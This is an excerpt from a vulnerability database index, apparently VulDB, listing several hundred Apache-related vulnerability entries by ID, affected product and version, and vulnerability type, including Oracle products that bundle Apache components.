11922| [129508] Oracle Applications Manager up to 12.2.8 Apache Derby unknown vulnerability
11923| [129507] Oracle Mobile Field Service up to 12.2.8 Apache Log4j unknown vulnerability
11924| [129505] Oracle Email Center up to 12.2.8 Apache Log4j unknown vulnerability
11925| [129504] Oracle CRM Technical Foundation up to 12.2.8 Apache Commons FileUpload unknown vulnerability
11926| [129499] Oracle Partner Management up to 12.2.8 Apache Log4j unknown vulnerability
11927| [129498] Oracle Marketing up to 12.2.8 Apache Commons FileUpload unknown vulnerability
11928| [129480] Oracle Communications WebRTC Session Controller up to 7.1 Apache Batik unknown vulnerability
11929| [129479] Oracle Communications Diameter Signaling Router up to 8.2 Apache Batik unknown vulnerability
11930| [129474] Oracle Communications Diameter Signaling Router up to 8.2 Apache HTTP Server information disclosure
11931| [129472] Oracle Communications WebRTC Session Controller up to 7.1 Apache Struts 1 unknown vulnerability
11932| [129470] Oracle Communications Converged Application Server up to 7.0.0.0 Apache Struts 1 unknown vulnerability
11933| [129463] Oracle Communications WebRTC Session Controller up to 7.1 Apache Log4j unknown vulnerability
11934| [129461] Oracle Communications Services Gatekeeper up to 6.1.0.3.x Apache Commons Collections Fileupload unknown vulnerability
11935| [129460] Oracle Communications Service Broker 6.0 Apache Log4j unknown vulnerability
11936| [129459] Oracle Communications Policy Management up to 12.4 Apache Struts 2 unknown vulnerability
11937| [129458] Oracle Communications Online Mediation Controller 6.1 Apache Log4j unknown vulnerability
11938| [129457] Oracle Communications Diameter Signaling Router up to 8.2 Apache Commons Fileupload unknown vulnerability
11939| [129456] Oracle Communications Converged Application Server 6.1 Apache Log4j unknown vulnerability
11940| [128714] Apache Thrift Java Client Library up to 0.11.0 SASL Negotiation org.apache.thrift.transport.TSaslTransport unknown vulnerability
11941| [128713] Apache Thrift Node.js Static Web Server up to 0.11.0 directory traversal
11942| [128709] Apache Karaf up to 4.1.6/4.2.1 Features Deployer XMLInputFactory XML External Entity
11943| [128575] Apache NetBeans 9.0 Proxy Auto-Config Code Execution
11944| [128369] Apache Tika 1.8-1.19.1 SQLite3Parser Loop sql injection
11945| [128111] Apache NiFi 1.8.0 Template Upload Man-in-the-Middle cross site request forgery
11946| [128110] Apache NiFi 1.8.0 Cluster Request privilege escalation
11947| [128109] Apache NiFi 1.8.0 Error Page message-page.jsp Request Header cross site scripting
11948| [128108] Apache NiFi up to 1.7.x X-Frame-Options Header privilege escalation
11949| [128102] Apache Oozie up to 5.0.0 Workflow XML Impersonation spoofing
11950| [127994] WordPress up to 5.0.0 on Apache httpd MIME Restriction cross site scripting
11951| [127981] Apache OFBiz 16.11.01/16.11.02/16.11.03/16.11.04 HTTP Engine httpService GET Request privilege escalation
11952| [127161] Apache Hadoop 2.7.4/2.7.5/2.7.6 Incomplete Fix CVE-2016-6811 privilege escalation
11953| [127040] Loadbalancer.org Enterprise VA MAX up to 8.3.2 Apache HTTP Server Log cross site scripting
11954| [127007] Apache Spark Request Code Execution
11955| [126791] Apache Hadoop up to 0.23.11/2.7.6/2.8.4/2.9.1/3.0.2 ZIP File unknown vulnerability
11956| [126767] Apache Qpid Proton-J Transport 0.3 Certificate Verification Man-in-the-Middle weak authentication
11957| [126896] Apache Commons FileUpload 1.3.3 on LDAP Manager DiskFileItem File privilege escalation
11958| [126574] Apache Hive up to 2.3.3/3.1.0 Query privilege escalation
11959| [126573] Apache Hive up to 2.3.3/3.1.0 HiveServer2 privilege escalation
11960| [126564] Apache Superset up to 0.22 Pickle Library load Code Execution
11961| [126488] Apache Syncope up to 2.0.10/2.1.1 BPMN Definition xxe privilege escalation
11962| [126487] Apache Syncope up to 2.0.10/2.1.1 cross site scripting
11963| [126346] Apache Tomcat Path privilege escalation
11964| [125922] Apache Impala up to 3.0.0 ALTER privilege escalation
11965| [125921] Apache Impala up to 3.0.0 Queue Injection privilege escalation
11966| [125647] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Install (Apache Tomcat) information disclosure
11967| [125617] Oracle Retail Returns Management 14.1 Apache Batik unknown vulnerability
11968| [125616] Oracle Retail Point-of-Service 13.4/14.0/14.1 Apache Batik unknown vulnerability
11969| [125614] Oracle Retail Central Office 14.1 Apache Batik unknown vulnerability
11970| [125613] Oracle Retail Back Office 13.3/13.4/14/14.1 Apache Batik unknown vulnerability
11971| [125599] Oracle Retail Open Commerce Platform 5.3.0/6.0.0/6.0.1 Apache Log4j unknown vulnerability
11972| [125569] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56 Apache HTTP Server information disclosure
11973| [125494] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat information disclosure
11974| [125447] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Batik unknown vulnerability
11975| [125428] Oracle Identity Management Suite 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
11976| [125427] Oracle Identity Analytics 11.1.1.5.8 Apache Log4j unknown vulnerability
11977| [125424] Oracle API Gateway 11.1.2.4.0 Apache Log4j unknown vulnerability
11978| [125423] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Log4j unknown vulnerability
11979| [125383] Oracle up to 10.2.0 Apache Trinidad unknown vulnerability
11980| [125379] Oracle up to 10.1.x Apache Struts 1 cross site scripting
11981| [125377] Oracle up to 10.2.0 Apache Commons Collections unknown vulnerability
11982| [125376] Oracle Communications Application Session Controller up to 3.7.0 Apache Commons Collections unknown vulnerability
11983| [125375] Oracle Communications User Data Repository up to 12.1.x Apache Xerces memory corruption
11984| [125248] Apache ActiveMQ up to 5.15.5 Web-based Administration Console queue.jsp Parameter cross site scripting
11985| [125133] Apache Tika up to 1.19 XML Parser reset() denial of service
11986| [124877] Apache PDFbox up to 2.0.11 PDF File denial of service
11987| [124876] Apache Ranger up to 1.1.x UnixAuthenticationService Stack-based memory corruption
11988| [124791] Apache Tomcat up to 7.0.90/8.5.33/9.0.11 URL Open Redirect
11989| [124787] Apache Pony Mail 0.7/0.8/0.9 Statistics Generator Timestamp Data information disclosure
11990| [124447] Apache HTTP Server up to 2.4.34 SETTINGS Frame denial of service
11991| [124346] Apache Mesos pre-1.4.2/1.5.0/1.5.1/1.6.0 on Executor HTTP API String Comparison validation JSON Web Token information disclosure
11992| [124286] Apache Tika up to 1.18 IptcAnpaParser Loop denial of service
11993| [124242] Apache Tika up to 0.18 C:/evil.bat" Directory unknown vulnerability
11994| [124241] Apache Tika up to 0.18 XML Parser Entity Expansion denial of service
11995| [124191] Apache Karaf up to 3.0.8/4.0.8/4.1.0 WebConsole .../gogo/ weak authentication
11996| [124190] Apache Karaf up to 4.1.x sshd privilege escalation
11997| [124152] Apache Camel Mail up to 2.22.0 Path directory traversal
11998| [124143] Apache SpamAssassin up to 3.4.1 PDFInfo Plugin Code Execution
11999| [124134] Apache SpamAssassin up to 3.4.1 Scan Engine HTML::Parser Email denial of service
12000| [124095] PHP up to 5.6.37/7.0.31/7.1.21/7.2.9 Apache2 sapi_apache2.c php_handler cross site scripting
12001| [124024] Apache Mesos 1.4.x/1.5.0 libprocess JSON Payload denial of service
12002| [123814] Apache ActiveMQ Client up to 5.15.5 TLS Hostname Verification Man-in-the-Middle weak authentication
12003| [123393] Apache Traffic Server up to 6.2.2/7.1.3 ESI Plugin Config privilege escalation
12004| [123392] Apache Traffic Server 6.2.2 TLS Handshake Segmentation Fault denial of service
12005| [123391] Apache Traffic Server up to 6.2.2/7.1.3 Range Request Performance denial of service
12006| [123390] Apache Traffic Server up to 6.2.2/7.1.3 Request HTTP Smuggling privilege escalation
12007| [123369] Apache Traffic Server up to 6.2.2/7.1.3 ACL remap.config Request denial of service
12008| [123197] Apache Sentry up to 2.0.0 privilege escalation
12009| [123145] Apache Struts up to 2.3.34/2.5.16 Namespace Code Execution
12010| [123144] Apache Cayenne up to 4.1.M1 CayenneModeler XML File File Transfer privilege escalation
12011| [122981] Apache Commons Compress 1.7 ZipArchiveInputStream ZIP Archive denial of service
12012| [122889] Apache HTTP Server up to 2.2.31/2.4.23 mod_userdir HTTP Response Splitting privilege escalation
12013| [122800] Apache Spark 1.3.0 REST API weak authentication
12014| [122642] Apache Airflow up to 1.8.x 404 Page Reflected cross site scripting
12015| [122568] Apache Tomcat up to 8.5.31/9.0.9 Connection Reuse weak authentication
12016| [122567] Apache Axis 1.0./1.1/1.2/1.3/1.4 cross site scripting
12017| [122556] Apache Tomcat up to 7.0.86/8.0.51/8.5.30/9.0.7 UTF-8 Decoder Loop denial of service
12018| [122531] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.9 WebSocket Client unknown vulnerability
12019| [122456] Apache Camel up to 2.20.3/2.21.0 XSD Validator XML External Entity
12020| [122455] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Revoked Certificate weak authentication
12021| [122454] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Responder Revoked Certificate weak authentication
12022| [122214] Apache Kafka up to 0.9.0.1/0.10.2.1/0.11.0.2/1.0.0 Broker Request Data Loss denial of service
12023| [122202] Apache Kafka up to 0.10.2.1/0.11.0.1 SASL Impersonation spoofing
12024| [122101] Docker Skeleton Runtime for Apache OpenWhisk Docker Action dockerskeleton:1.3.0 privilege escalation
| [122100] PHP Runtime for Apache OpenWhisk Docker Action action-php-v7.2:1.0.0 privilege escalation
| [122012] Apache Ignite up to 2.5 Serialization privilege escalation
| [121911] Apache Ambari up to 2.5.x/2.6.2 Log Message Credentials information disclosure
| [121910] Apache HTTP Server 2.4.33 mod_md HTTP Requests denial of service
| [121854] Oracle Tape Library ACSLS up to ACSLS 8.4.0-2 Apache Commons Collections unknown vulnerability
| [121752] Oracle Insurance Policy Administration 10.0/10.1/10.2/11.0 Apache Log4j unknown vulnerability
| [121370] Apache Spark up to 2.1.2/2.2.1/2.3.0 URL cross site scripting
| [121354] Apache CouchDB HTTP API Code Execution
| [121144] Apache LDAP API up to 1.0.1 SSL Filter information disclosure
| [121143] Apache storm up to 0.10.2/1.0.6/1.1.2/1.2.1 Cluster privilege escalation
| [120436] Apache CXF Fediz up to 1.4.3 Application Plugin unknown vulnerability
| [120310] Apache PDFbox up to 1.8.14/2.0.10 AFMParser Loop denial of service
| [120168] Apache CXF weak authentication
| [120080] Apache Cassandra up to 3.11.1 JMX/RMI Interface RMI Request privilege escalation
| [120043] Apache HBase up to 1.2.6.0/1.3.2.0/1.4.4/2.0.0 Thrift 1 API Server weak authentication
| [119723] Apache Qpid Broker-J 7.0.0/7.0.1/7.0.2/7.0.3/7.0.4 AMQP Messages Crash denial of service
| [122569] Apache HTTP Server up to 2.4.33 HTTP2 Request denial of service
| [119486] Apache Geode up to 1.4.0 Security Manager Code Execution
| [119306] Apache MXNet Network Interface privilege escalation
| [118999] Apache Storm up to 1.0.6/1.1.2/1.2.1 Archive directory traversal
| [118996] Apache Storm up to 1.0.6/1.1.2/1.2.1 Daemon spoofing
| [118644] Apple macOS up to 10.13.5 apache_mod_php unknown vulnerability
| [118200] Apache Batik up to 1.9 Deserialization unknown vulnerability
| [118143] Apache NiFi activemq-client Library Deserialization denial of service
| [118142] Apache NiFi 1.6.0 SplitXML xxe privilege escalation
| [118051] Apache Zookeeper up to 3.4.9/3.5.3-beta weak authentication
| [117997] Apache ORC up to 1.4.3 ORC File Recursion denial of service
| [117825] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.8 CORS Filter privilege escalation
| [117405] Apache Derby up to 10.14.1.0 Network Server Network Packet privilege escalation
| [117347] Apache Ambari up to 2.6.1 HTTP Request directory traversal
| [117265] LibreOffice/Apache Office Writer SMB Connection XML Document information disclosure
| [117143] Apache uimaj/uima-as/uimaFIT/uimaDUCC XML XXE information disclosure
| [117117] Apache Tika up to 1.17 ChmParser Loop denial of service
| [117116] Apache Tika up to 1.17 BPGParser Loop denial of service
| [117115] Apache Tika up to 1.17 tika-server command injection
| [116929] Apache Fineract getReportType Parameter privilege escalation
| [116928] Apache Fineract REST Endpoint Parameter privilege escalation
| [116927] Apache Fineract MakercheckersApiResource Parameter sql injection
| [116926] Apache Fineract REST Hand Parameter privilege escalation
| [116574] Apache wicket-jquery-ui up to 6.29.0/7.10.1/8.0.0-M9.1 WYSIWYG Editor privilege escalation
| [116622] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General (Apache Tomcat) unknown vulnerability
| [115931] Apache Solr up to 6.6.2/7.2.1 XML Data Parameter XML External Entity
| [115883] Apache Hive up to 2.3.2 privilege escalation
| [115882] Apache Hive up to 2.3.2 xpath_short information disclosure
| [115881] Apache DriverHive JDBC Driver up to 2.3.2 Escape Argument Bypass privilege escalation
| [115518] Apache Ignite 2.3 Deserialization privilege escalation
| [115260] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache cross site scripting
| [115259] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache Cookie Stack-based memory corruption
| [115500] CA Workload Control Center up to r11.4 SP5 Apache MyFaces Component Code Execution
| [115121] Apache Struts REST Plugin up to 2.5.15 Xstream XML Data denial of service
| [115061] Apache HTTP Server up to 2.4.29 HTTP Digest Authentication Challenge HTTP Requests Replay privilege escalation
| [115060] Apache HTTP Server up to 2.4.29 mod_cache_socache Request Header Crash denial of service
| [115059] Apache HTTP Server up to 2.4.29 HTTP2 NULL Pointer Dereference denial of service
| [115058] Apache HTTP Server up to 2.4.29 HTTP Header Crash denial of service
| [115057] Apache HTTP Server up to 2.4.29 mod_session Variable Name Cache privilege escalation
| [115039] Apache HTTP Server up to 2.4.29 FilesMatch File Upload privilege escalation
| [115038] Apache HTTP Server up to 2.0.65/2.2.34/2.4.29 mod_authnz_ldap Crash denial of service
| [114817] Apache Syncope up to 1.2.10/2.0.7 Search Parameter information disclosure
| [114816] Apache Syncope up to 1.2.10/2.0.7 XSLT Code Execution
| [114717] Apache Commons 1.11/1.12/1.13/1.14/1.15 ZIP Archive ZipFile/ZipArchiveInputStream denial of service
| [114661] Apache Allura up to 1.8.0 HTTP Response Splitting privilege escalation
| [114400] Apache Tomcat JK ISAPI Connector up to 1.2.42 IIS/ISAPI privilege escalation
| [114258] Apache HTTP Server up to 2.4.22 mod_cluster Segmentation Fault denial of service
| [114086] Apache ODE 1.3.3 ODE Process Deployment Web Service directory traversal
| [113955] Apache Xerces-C up to 3.2.0 XML Parser NULL Pointer Dereference denial of service
| [113945] Apache Tomcat up to 7.0.84/8.0.49/8.5.27/9.0.4 URL Pattern Empty String privilege escalation
| [113944] Apache OpenMeetings up to 3.x/4.0.1 CRUD Operation denial of service
| [113905] Apache Traffic Server up to 5.2.x/5.3.2/6.2.0/7.0.0 TLS Handshake Core Dump denial of service
| [113904] Apache Traffic Server up to 6.2.0 Host Header privilege escalation
| [113895] Apache Geode up to 1.3.x Code Execution
| [113894] Apache Geode up to 1.3.x TcpServer Code Execution
| [113888] Apache James Hupa WebMail 0.0.2 cross site scripting
| [113813] Apache Geode Cluster up to 1.3.x Secure Mode privilege escalation
| [113747] Apache Tomcat Servlets privilege escalation
| [113647] Apache Qpid up to 0.30 qpidd Broker AMQP Message Crash denial of service
| [113645] Apache VCL up to 2.1/2.2.1/2.3.1 Web GUI/XMLRPC API privilege escalation
| [113560] Apache jUDDI Console 3.0.0 Log Entries spoofing
| [113571] Apache Oozie up to 4.3.0/5.0.0-beta1 XML Data XML File privilege escalation
| [113569] Apache Karaf up to 4.0.7 LDAPLoginModule LDAP injection denial of service
| [113273] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
| [113198] Apache Qpid Dispatch Router 0.7.0/0.8.0 AMQP denial of service
| [113186] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
| [113145] Apache Thrift up to 0.9.3 Go Client Library privilege escalation
| [113106] Apache jUDDI up to 3.3.3 XML Data WADL2Java/WSDL2Java XML Document privilege escalation
| [113105] Apache Qpid Broker-J 7.0.0 AMQP Crash denial of service
| [112885] Apache Allura up to 1.8.0 File information disclosure
| [112856] Apache CloudStack up to 4.8.1.0/4.9.0.0 API weak authentication
| [112855] Apache CloudStack 4.1.0/4.1.1 API information disclosure
| [112678] Apache Tomcat up to 7.0.82/8.0.47/8.5.23/9.0.1 Bug Fix 61201 privilege escalation
| [112677] Apache Tomcat Native Connector up to 1.1.34/1.2.14 OCSP Checker Client weak authentication
| [112625] Apache POI up to 3.16 Loop denial of service
| [112448] Apache NiFi up to 1.3.x Deserialization privilege escalation
| [112396] Apache Hadoop 2.7.3/2.7.4 YARN NodeManager Credentials information disclosure
| [112339] Apache NiFi 1.5.0 Header privilege escalation
| [112330] Apache NiFi 1.5.0 Header HTTP Request privilege escalation
| [112314] NetGain Enterprise Manager 7.2.730 Build 1034 org.apache.jsp.u.jsp.tools.exec_jsp Servlet Parameter privilege escalation
| [112253] Apache Hadoop up to 0.23.x/2.7.4/2.8.2 MapReduce Job History Server Configuration File privilege escalation
| [112171] Oracle Secure Global Desktop 5.3 Apache Log4j privilege escalation
| [112164] Oracle Agile PLM 9.3.5/9.3.6 Apache Tomcat unknown vulnerability
| [112161] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Tomcat privilege escalation
| [112158] Oracle Autovue for Agile Product Lifecycle Management 21.0.0/21.0.1 Apache Log4j privilege escalation
| [112156] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Log4j privilege escalation
| [112155] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Apache Log4j privilege escalation
| [112137] Oracle MICROS Relate CRM Software 10.8.x/11.4.x/15.0.x, Apache Tomcat unknown vulnerability
| [112136] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat privilege escalation
| [112133] Oracle Retail Workforce Management 1.60.7/1.64.0 Apache Log4j privilege escalation
| [112129] Oracle Retail Assortment Planning 14.1.3/15.0.3/16.0.1 Apache Log4j privilege escalation
| [112114] Oracle 9.1 Apache Log4j privilege escalation
| [112113] Oracle 9.1 Apache Log4j privilege escalation
| [112045] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat privilege escalation
| [112038] Oracle Health Sciences Empirica Inspections 1.0.1.1 Apache Tomcat information disclosure
| [112019] Oracle Endeca Information Discovery Integrator 3.1.0/3.2.0 Apache Tomcat privilege escalation
| [112017] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Apache Struts 1 cross site scripting
| [112011] Oracle Identity Manager 11.1.2.3.0 Apache Commons Collections privilege escalation
| [111950] Oracle Database 12.2.0.1 Apache Tomcat information disclosure
| [111703] Apache Sling XSS Protection API 1.0.4 URL Encoding cross site scripting
| [111556] Apache Geode up to 1.2.x Secure Mode Parameter OQL privilege escalation
| [111555] Apache Geode up to 1.2.x Secure Mode OQL privilege escalation
| [111540] Apache Geode up to 1.2.x Secure Mode information disclosure
| [111519] Apache Sling JCR ContentLoader 2.1.4 xmlreader directory traversal
| [111338] Apache DeltaSpike-JSF 1.8.0 cross site scripting
| [111330] Apache OFBiz 16.11.01/16.11.02/16.11.03 BIRT Plugin cross site scripting
| [110789] Apache Sling up to 1.4.0 Authentication Service Credentials information disclosure
| [110785] Apache Drill up to 1.11.0 Query Page unknown vulnerability
| [110701] Apache Fineract Query Parameter sql injection
| [110484] Apache Synapse up to 3.0.0 Apache Commons Collections Serialized Object Code Injection privilege escalation
| [110426] Adobe Experience Manager 6.0/6.1/6.2/6.3 Apache Sling Servlets Post cross site scripting
| [110393] Apple macOS up to 10.13.2 apache information disclosure
| [110141] Apache Struts up to 2.5.14 REST Plugin denial of service
| [110140] Apache Qpid Broker-J up to 0.32 privilege escalation
| [110139] Apache Qpid Broker-J up to 6.1.4 AMQP Frame denial of service
| [110106] Apache CXF Fediz Spring cross site request forgery
| [109766] Apache OpenOffice up to 4.1.3 DOC File Parser WW8Fonts memory corruption
| [109750] Apache OpenOffice up to 4.1.3 DOC File Parser ImportOldFormatStyles memory corruption
| [109749] Apache OpenOffice up to 4.1.3 PPT File Parser PPTStyleSheet memory corruption
| [109606] October CMS Build 412 Apache Configuration File Upload privilege escalation
| [109419] Apache Camel up to 2.19.3/2.20.0 camel-castor Java Object Deserialization privilege escalation
| [109418] Apache Camel up to 2.19.3/2.20.0 camel-hessian Java Object Deserialization privilege escalation
| [109400] Apache CouchDB up to 1.6.x/2.1.0 Database Server Shell privilege escalation
| [109399] Apache CouchDB up to 1.6.x/2.1.0 JSON Parser Shell privilege escalation
| [109398] Apache CXF 3.1.14/3.2.1 JAX-WS/JAX-RS Attachment denial of service
| [108872] Apache Hive up to 2.1.1/2.2.0/2.3.0 Policy Enforcement privilege escalation
| [108939] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108938] Apple macOS up to 10.13.1 apache denial of service
| [108937] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108936] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108935] Apple macOS up to 10.13.1 apache denial of service
| [108934] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108933] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108932] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108931] Apple macOS up to 10.13.1 apache denial of service
| [108930] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108929] Apple macOS up to 10.13.1 apache denial of service
| [108928] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108797] Apache Struts up to 2.3.19 TextParseUtiltranslateVariables OGNL Expression privilege escalation
| [108795] Apache Traffic Server up to 5.3.0 HTTP2 set_dynamic_table_size memory corruption
| [108794] Apache WSS4J up to 1.6.16/2.0.1 Incomplete Fix Leak information disclosure
| [108793] Apache Qpid up to 0.30 qpidd Crash denial of service
| [108792] Apache Traffic Server up to 5.1.0 Access Restriction privilege escalation
| [108791] Apache Wicket up to 1.5.11/6.16.x/7.0.0-M2 Session information disclosure
| [108790] Apache storm 0.9.0.1 Log Viewer directory traversal
| [108789] Apache Cordova In-App-Browser Standalone Plugin up to 0.3.1 on iOS CDVInAppBrowser privilege escalation
| [108788] Apache Cordova File-Transfer Standalone Plugin up to 0.4.1 on iOS ios/CDVFileTransfer.m spoofing
| [108787] Apache HttpClient up to 4.3.0 HttpClientBuilder.java unknown vulnerability
| [108786] Apache Wicket up to 1.4.21/1.5.9/6.3.x script Tag cross site scripting
| [108783] Apache Hadoop up to 0.23.3/1.0.3/2.0.1 Kerberos Security Feature Key weak encryption
| [108782] Apache Xerces2 XML Service denial of service
| [108781] Apache jUDDI up to 1.x happyjuddi.jsp Parameter cross site scripting
| [108780] Apache jUDDI up to 1.x Log File uddiget.jsp spoofing
| [108709] Apache Cordova Android up to 3.7.1/4.0.1 intent URL privilege escalation
| [108708] Apache ActiveMQ up to 5.10.0 XML Data XML External Entity
| [108707] Apache ActiveMQ up to 1.7.0 XML Data XML External Entity
| [108629] Apache OFBiz up to 10.04.01 privilege escalation
| [108543] Apache Derby 10.1.2.1/10.2.2.0/10.3.1.4/10.4.1.3 Export File privilege escalation
| [108312] Apache HTTP Server on RHEL IP Address Filter privilege escalation
| [108297] Apache NiFi up to 0.7.1/1.1.1 Proxy Chain Username Deserialization privilege escalation
| [108296] Apache NiFi up to 0.7.1/1.1.1 Cluster Request privilege escalation
| [108250] Oracle Secure Global Desktop 5.3 Apache HTTP Server memory corruption
| [108245] Oracle Transportation Management up to 6.3.7 Apache Tomcat unknown vulnerability
| [108244] Oracle Transportation Management 6.4.1/6.4.2 Apache Commons FileUpload denial of service
| [108243] Oracle Agile Engineering Data Management 6.1.3/6.2.0 Apache Commons Collections memory corruption
| [108222] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Batik denial of service
| [108219] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat unknown vulnerability
| [108217] Oracle Retail Store Inventory Management 13.2.9/14.0.4/14.1.3/15.0.1/16.0.1 Apache Groovy unknown vulnerability
| [108216] Oracle Retail Convenience and Fuel POS Software 2.1.132 Apache Groovy unknown vulnerability
| [108169] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Apache Tomcat unknown vulnerability
| [108113] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Batik denial of service
| [108107] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat unknown vulnerability
| [108102] Oracle Healthcare Master Person Index 4.x Apache Groovy unknown vulnerability
| [108085] Oracle Identity Manager 11.1.2.3.0 Apache Struts 1 memory corruption
| [108083] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
| [108080] Oracle GlassFish Server 3.1.2 Apache Commons FileUpload denial of service
| [108069] Oracle Endeca Information Discovery Integrator 2.4/3.0/3.1/3.2 Apache Commons Collections memory corruption
| [108067] Oracle Business Process Management Suite 11.1.1.9.0/12.2.1.1.0 Apache Commons Collections memory corruption
| [108066] Oracle Management Pack for GoldenGate 11.2.1.0.12 Apache Tomcat memory corruption
| [108065] Oracle Management Pack for GoldenGate 11.2.1.0.12 Apache Commons Collections memory corruption
| [108062] Oracle BI Publisher 11.1.1.7.0/12.2.1.1.0/12.2.1.2.0 Apache ActiveMQ memory corruption
| [108060] Oracle Enterprise Manager Ops Center 12.2.2/12.3.2 Apache Groovy unknown vulnerability
| [108033] Oracle Primavera Unifier 9.13/9.14/10.x/15.x/16.x, Apache Groovy unknown vulnerability
| [108024] Oracle Communications Order and Service Management 7.2.4.x.x/7.3.0.x.x/7.3.1.x.x/7.3.5.x.x Apache Commons Collections memory corruption
| [108015] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Commons Collections memory corruption
| [108013] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Groovy unknown vulnerability
| [108011] Oracle Communications Services Gatekeeper 5.1/6.0 Apache Trinidad unknown vulnerability
| [107904] Apache Struts up to 2.3.28 Double OGNL Evaluation privilege escalation
| [107860] Apache Solr up to 7.0 Apache Lucene RunExecutableListener XML External Entity
| [107834] Apache Ranger up to 0.6.1 Change Password privilege escalation
| [107639] Apache NiFi 1.4.0 XML External Entity
| [107606] Apache ZooKeper up to 3.4.9/3.5.2 Command CPU Exhaustion denial of service
| [107597] Apache Roller up to 5.0.2 XML-RPC Protocol Support XML External Entity
| [107429] Apache Impala up to 2.9.x Kudu Table privilege escalation
| [107411] Apache Tomcat up to 7.0.81/8.0.46/8.5.22/9.0.0 JSP File File Upload privilege escalation
| [107385] Apache Geode up to 1.2.0 Secure Mode privilege escalation
| [107339] Apache OpenNLP up to 1.5.3/1.6.0/1.7.2/1.8.1 XML Data XML External Entity
| [107333] Apache Wicket up to 8.0.0-M1 CSRF Prevention HTTP Header privilege escalation
| [107323] Apache Wicket 1.5.10/6.13.0 Class Request information disclosure
| [107310] Apache Geode up to 1.2.0 Command Line Utility Query privilege escalation
| [107276] ArcSight ESM/ArcSight ESM Express up to 6.9.1c Patch 3/6.11.0 Apache Tomcat Version information disclosure
| [107266] Apache Tika up to 1.12 XML Parser XML External Entity
| [107262] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
| [107258] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
| [107197] Apache Xerces Jelly Parser XML File XML External Entity
| [107193] ZTE NR8950 Apache Commons Collections RMI Request Deserialization privilege escalation
| [107084] Apache Struts up to 2.3.19 cross site scripting
| [106877] Apache Struts up to 2.0.33/2.5.10 Freemarker Tag privilege escalation
| [106875] Apache Struts up to 2.5.5 URL Validator denial of service
| [106874] Apache Struts up to 2.3.30 Convention Plugin directory traversal
| [106847] Apache Tomcat up to 7.0.80 VirtualDirContext Source information disclosure
| [106846] Apache Tomcat up to 7.0.79 on Windows HTTP PUT Method Parameter File Upload privilege escalation
| [106777] Apache HTTP Server up to 2.2.34/2.4.27 Limit Directive ap_limit_section HTTP Request information disclosure
| [106739] puppetlabs-apache up to 1.11.0/2.0.x weak authentication
| [106720] Apache Wicket up to 1.5.12/6.18.x/7.0.0-M4 CryptoMapper privilege escalation
| [106586] Apache Brooklyn up to 0.9.x REST Server cross site scripting
| [106562] Apache Spark up to 2.1.1 Launcher API Deserialization privilege escalation
| [106559] Apache Brooklyn up to 0.9.x SnakeYAML YAML Data Java privilege escalation
| [106558] Apache Brooklyn up to 0.9.x REST Server cross site request forgery
| [106556] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
| [106555] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
| [106171] Apache Directory LDAP API up to 1.0.0-M30 Timing unknown vulnerability
| [106167] Apache Struts up to 2.5.12 REST Plugin XML Data privilege escalation
| [106166] Apache Struts up to 2.3.33/2.5.12 REST Plugin denial of service
| [106165] Apache Struts up to 2.3.33/2.5.12 URLValidator Regex CPU Exhaustion denial of service
| [106115] Apache Hadoop up to 2.6.4/2.7.2 YARN NodeManager Password information disclosure
| [106012] Apache Solr up to 5.5.3/6.4.0 Replication directory traversal
| [105980] Apache Engine 16.11.01 Parameter Reflected unknown vulnerability
| [105962] Apache Atlas 0.6.0/0.7.0 Frame cross site scripting
| [105961] Apache Atlas 0.6.0/0.7.0 Stack Trace information disclosure
| [105960] Apache Atlas 0.6.0/0.7.0 Search Reflected cross site scripting
| [105959] Apache Atlas 0.6.0/0.7.0 edit Tag DOM cross site scripting
| [105958] Apache Atlas 0.6.0/0.7.0 edit Tag Stored cross site scripting
| [105957] Apache Atlas 0.6.0/0.7.0 Cookie privilege escalation
| [105905] Apache Atlas 0.6.0/0.7.0/0.7.1 /js privilege escalation
| [105878] Apache Struts up to 2.3.24.0 privilege escalation
| [105682] Apache2Triad 1.5.4 phpsftpd/users.php Parameter cross site scripting
